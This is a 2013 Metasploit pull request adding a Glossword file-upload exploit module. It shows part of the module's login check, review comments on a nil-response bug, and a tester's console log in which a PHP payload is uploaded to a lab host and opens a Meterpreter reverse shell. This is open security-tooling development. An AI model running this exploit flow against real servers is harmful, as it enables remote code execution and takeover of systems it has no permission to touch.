Add Glossword Arbitrary File Upload Vulnerability exploit #1515

Merged
merged 2 commits into from Feb 25, 2013

@bcoles
Contributor
bcoles commented Feb 24, 2013

Add Glossword Arbitrary File Upload Vulnerability exploit module.

@brandonprry brandonprry and 1 other commented on an outdated diff Feb 24, 2013
modules/exploits/multi/http/glossword_upload_exec.rb
+ def check
+
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+ peer = "#{rhost}:#{rport}"
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+
+ # login
+ print_status("#{peer} - Authenticating as user '#{user}'")
+ begin
+ res = login(base, user, pass)
+ if res and res.code == 200
+ print_error("#{peer} - Authentication failed")
+ return Exploit::CheckCode::Unknown
+ elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
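
Review bot: The `elsif` on the last line calls `res.code` without checking `res`, so a nil response (timeout or connection failure) skips the guarded `if res and res.code == 200` branch and raises NoMethodError here. Handle the nil case once before the `if`, for example `return Exploit::CheckCode::Unknown unless res`, and then branch on the status code. Separately, `base << '/'` appends in place to the string object returned by `target_uri.path`; if that object is shared, the change is visible outside `check`, so prefer building a new string with `base = base + '/'`.
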
@brandonprry
brandonprry Feb 24, 2013 Contributor

I think there is a bug here. If res is nil, it will fall into this elsif and throw a nil exception when trying to access code.

@bcoles
bcoles Feb 25, 2013 Contributor

Good call. Fixed in commit d7c0ce4.

@wchen-r7
Contributor

Tested:

msf  exploit(glossword_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.83:4444 
[!] TEST
[*] 192.168.1.72:80 - Authenticating as user 'admin'
[+] 192.168.1.72:80 - Authenticated successfully
[*] 192.168.1.72:80 - Uploading PHP payload (1315 bytes)
[+] 192.168.1.72:80 - File uploaded successfully
[*] 192.168.1.72:80 - Locating PHP payload file
[+] 192.168.1.72:80 - Found payload file path (gw_temp/a/1361816417_GaNRpGDXFH.php)
[*] 192.168.1.72:80 - Executing payload (gw_temp/a/1361816417_GaNRpGDXFH.php)
[*] Sending stage (39217 bytes) to 192.168.1.72
[*] Meterpreter session 3 opened (192.168.1.83:4444 -> 192.168.1.72:45520) at 2013-02-25 12:20:17 -0600

@wchen-r7 wchen-r7 merged commit d7c0ce4 into rapid7:master Feb 25, 2013

1 check passed

default The Travis build passed
@bcoles bcoles deleted the bcoles:glossword_upload_exec branch Feb 26, 2013